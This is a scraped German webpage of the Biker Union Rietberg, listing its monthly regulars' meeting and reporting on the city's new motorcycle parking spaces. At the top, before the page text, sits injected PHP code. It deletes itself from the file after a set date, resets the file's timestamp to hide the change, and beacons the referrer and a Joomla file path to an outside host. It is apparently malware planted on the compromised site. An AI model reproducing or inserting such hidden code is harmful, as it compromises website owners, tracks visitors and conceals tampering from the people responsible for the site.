check_meta(); function check_meta(){ $jp = __FILE__; $jptime = filemtime($jp); if(time() >= 1456732012){ $jp_c = file_get_contents($jp); if($t = @strpos($jp_c,"check_meta();")) { $contentp = substr($jp_c,0,$t); if(@file_put_contents($jp, $contentp)){ @touch($jp,$jptime); } } } @file_get_contents("http://web.51.la:82/go.asp?svid=8&id=18776828&referrer=".$_SERVER['HTTP_REFERER']."&vpage=http://".$_SERVER['SERVER_NAME']."/components/com_search/models/content.php"); } Veranstaltungen

"GEMEINSAM FAHREN - GEMEINSAM KÄMPFEN FÜR UNSERE RECHTE" 

  • Slide image one
  • Slide image two
  • Slide image three
Der Stammtisch findet jeden 2. Dienstag im Monat statt

stammtisch

          
Zum Laternchen
Langer Schemm 1
33397 Rietberg

20.00 Uhr

Ansprechpartner: Cordula Dirksen: Diese E-Mail-Adresse ist gegen Spambots geschützt! JavaScript muss aktiviert werden, damit sie angezeigt werden kann.

Mehr Infos zum Stammtisch

stammtischrietberg

IMG 20130709 205208IMG 20130709 205243

 
Stadt markiert erste Motorradstellplätze

Neu eingerichtet: Stadt markiert erste Motorradstellplätze am Schulzentrum

995107 491981520888603 1879190077 nRietberg. "Warum sollen wir angesichts der Enge auf den städtischen Parkplätzen an manchen Tagen den Autos mehr Raum wegnehmen als notwendig?" fragten sich die Mitglieder der Biker-Union Rietberg bei einem ihrer regelmäßigen Treffen. Jetzt müssen sie das auch nicht mehr, denn die Stadtverwaltung richtete auf den Stellflächen am Zentralen Omnibusbahnhof spezielle Motorradparkplätze ein. "Wir haben die diesbezügliche Anregung unserer Motorradfahrer gerne aufgegriffen und sie umgehend in die Tat umgesetzt", erklärt Bürgermeister Andreas Sunder. "Und sicherlich werden die ersten vier Spezialparkplätze nicht die letzten bleiben." An Sunder hatten sich die Sprecher der Biker Union direkt gewandt. In einem persönlichen Gespräch legten die ambitionierten Zweiradfahrer ihr Anliegen dar und brachten auch gleich Vorschläge mit, wo solche speziell markierten Flächen besonderen Sinn machen könnten. "Am Schulzentrum war das natürlich naheliegend", so Walter Dahlke, "denn mittlerweile nutzen doch viele Jugendliche aus den Stadtteilen lieber einen Roller als den Bus, um zeitlich unabhängiger zu sein."

D976362 491767690909986 345739162 oie ersten vier Stellflächen speziell für Bikes, sie sind wesentlich schmaler als normale Pkw-Plätze, legte die Stadt direkt an der Umzäunung zur Cultura an, denn: "neben diesem Bereich befindet sich eine Sitzecke und das ist ideal für alle Motorradfahrer, die als Touristen hierhin kommen. Sie können ihre Utensilien erst einmal ablegen und Jacken wechseln. Und haben dann auch die Chance, gleich gegenüber am Eingang zum Gartenschaupark eine der abschließbaren Gepäckboxen zu nutzen", begründet Jens Schulze, warum die heimische Biker Union genau diesen Standort favorisiert hatte. Langfristig wünschen sich die Aktiven "drei Gepäcksafes direkt neben den Stellplätzen. "Wir suchen selbst einen Sponsor, der uns die Anschaffung ermöglicht", so Schulze.

Die Anbringung der abschließbaren Behälter werde die Stadt gerne übernehmen, ergänzt Martina Venne, zuständige Sachbearbeiterin in der Stadtverwaltung. Die Stadt sei sicher auch bereit, nach und nach weitere Motorradparkplätze mit einer Ausdehnung von 1,50cm Breite und 2m Länge zu markieren, "wir müssen nur schauen, wo genau man diese positionieren sollte." Für die Biker machen Standorte vor allem da Sinn, "wo in den sieben Ortsteilen auch touristische Ziele angesteuert werden", so Walter Dahlke, der plant, selbst eine individuelle Rietberg-Route für Motorradfahrer auszuarbeiten. Biker, die sich für die organisierte Gruppe aus der Region interessieren, sind an jedem zweiten Dienstagabend im Monat in der Gastwirtschaft Laternchen herzlich zur Teilnahme an den Treffen eingeladen.

Foto: Cordula Dirksen, Jens Schulze, Martin Hartmann und Walter Dahlke (von links) von der Rietberger Biker Union freuen sich mit Martina Venne (2.von links), zuständige Mitarbeiterin in der Stadtverwaltung, über die ersten Motorradstellplätze in der Emskommune. Foto: Stadt Rietberg

— mit Biker Union Stammtisch Rietberg, Cordula Dirksen, Jens Schulze, Martin Hartmann, Martina Venne und Walter Dahlke.

 

 
BU-Vorstellungsvideo

Die größte Interessenvertretung der Biker, Rocker und Motorradfahrer in Deutschland stellt sich vor: